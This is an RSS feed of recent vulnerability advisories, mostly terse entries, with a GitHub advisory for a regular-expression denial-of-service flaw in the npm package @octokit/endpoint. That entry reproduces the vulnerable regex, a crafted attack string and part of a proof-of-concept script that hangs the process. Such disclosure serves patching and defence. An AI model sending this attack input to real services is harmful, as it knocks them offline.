<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 04:32:00 +0000</lastBuildDate>
    <item>
      <title>certfr-2025-avi-0279 — De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquan…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2025-avi-0279</link>
      <description>certfr-2025-avi-0279</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2025-avi-0279</guid>
    </item>
    <item>
      <title>Withdrawn: CLEANSTART-2026-AD27625 — Security fixes for CVE-2022-25881, CVE-2022-33987, CVE-2025-25285, CVE-2025-62718, CVE-2025-69873, CVE-2026-21637, CVE-…</title>
      <link>https://cve.radiocsirt.org/vuln/cleanstart-2026-ad27625</link>
      <description>&lt;p&gt;&lt;strong&gt;Withdrawn by the publisher.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; CleanStart: mongosh&lt;/p&gt;
&lt;p&gt;Multiple security vulnerabilities affect the mongosh package. These issues are resolved in later releases. See references for individual vulnerability details.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Withdrawn by the publisher.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; CleanStart: mongosh&lt;/p&gt;
&lt;p&gt;Multiple security vulnerabilities affect the mongosh package. These issues are resolved in later releases. See references for individual vulnerability details.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cleanstart-2026-ad27625</guid>
    </item>
    <item>
      <title>EUVD-2026-217757</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-217757</link>
      <description>EUVD-2026-217757</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-217757</guid>
    </item>
    <item>
      <title>fkie_cve-2025-25285</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-25285</link>
      <description>&lt;p&gt;@octokit/endpoint turns REST API endpoints into generic request options. Starting in version 4.1.0 and prior to version 10.1.3, by crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization. The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. Version 10.1.3 contains a patch for the issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;@octokit/endpoint turns REST API endpoints into generic request options. Starting in version 4.1.0 and prior to version 10.1.3, by crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization. The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. Version 10.1.3 contains a patch for the issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-25285</guid>
    </item>
    <item>
      <title>GHSA-x4c5-c7rf-jjgv — @octokit/endpoint has a Regular Expression in parse that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-x4c5-c7rf-jjgv</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @octokit/endpoint&lt;/p&gt;
&lt;p&gt;### Summary
By crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization.&lt;/p&gt;
&lt;p&gt;### Details
The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:
```ts
headers.accept.match(/[\w-]+(?=-preview)/g) || ([] as string[]);
```
The regular expression `/[\w-]+(?=-preview)/g` encounters a backtracking issue when it processes `a large number of characters` followed by the `-` symbol.
e.g., the attack string: 
```js
&amp;#34;&amp;#34; + &amp;#34;A&amp;#34;.repeat(100000) + &amp;#34;-&amp;#34;
```&lt;/p&gt;
&lt;p&gt;### PoC
[The gist](https://gist.github.com/ShiyuBanzhou/a17202ac1ad403a80ca302466d5e56c4)
Here is the reproduction process for the vulnerability:
1. run `npm i @octokit/endpoint`
2. Move `poc.js` to the root directory of the same level as `README.md`
3. run `node poc.js`
result:
4. then the program will be stuck forever with high CPU usage
```js
import { endpoint } from &amp;#34;@octokit/endpoint&amp;#34;;
// import { parse } from &amp;#34;./node_modules/@octokit/endpoint/dist-src/parse.js&amp;#34;;
const options = {  
  method: &amp;#34;POST&amp;#34;,
  url: &amp;#34;/graphql&amp;#34;, // Ensure that the URL ends with &amp;#34;/graphql&amp;#34;
  headers: {
    accept: &amp;#34;&amp;#34; + &amp;#34;A&amp;#34;.repeat(100000) + &amp;#34;-&amp;#34;, // Pass in the attack string
    &amp;#34;content-type&amp;#34;: &amp;#34;text/plain&amp;#34;,
  },
  mediaType:…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @octokit/endpoint&lt;/p&gt;
&lt;p&gt;### Summary
By crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization.&lt;/p&gt;
&lt;p&gt;### Details
The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:
```ts
headers.accept.match(/[\w-]+(?=-preview)/g) || ([] as string[]);
```
The regular expression `/[\w-]+(?=-preview)/g` encounters a backtracking issue when it processes `a large number of characters` followed by the `-` symbol.
e.g., the attack string: 
```js
&amp;#34;&amp;#34; + &amp;#34;A&amp;#34;.repeat(100000) + &amp;#34;-&amp;#34;
```&lt;/p&gt;
&lt;p&gt;### PoC
[The gist](https://gist.github.com/ShiyuBanzhou/a17202ac1ad403a80ca302466d5e56c4)
Here is the reproduction process for the vulnerability:
1. run `npm i @octokit/endpoint`
2. Move `poc.js` to the root directory of the same level as `README.md`
3. run `node poc.js`
result:
4. then the program will be stuck forever with high CPU usage
```js
import { endpoint } from &amp;#34;@octokit/endpoint&amp;#34;;
// import { parse } from &amp;#34;./node_modules/@octokit/endpoint/dist-src/parse.js&amp;#34;;
const options = {  
  method: &amp;#34;POST&amp;#34;,
  url: &amp;#34;/graphql&amp;#34;, // Ensure that the URL ends with &amp;#34;/graphql&amp;#34;
  headers: {
    accept: &amp;#34;&amp;#34; + &amp;#34;A&amp;#34;.repeat(100000) + &amp;#34;-&amp;#34;, // Pass in the attack string
    &amp;#34;content-type&amp;#34;: &amp;#34;text/plain&amp;#34;,
  },
  mediaType:…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-x4c5-c7rf-jjgv</guid>
    </item>
  </channel>
</rss>
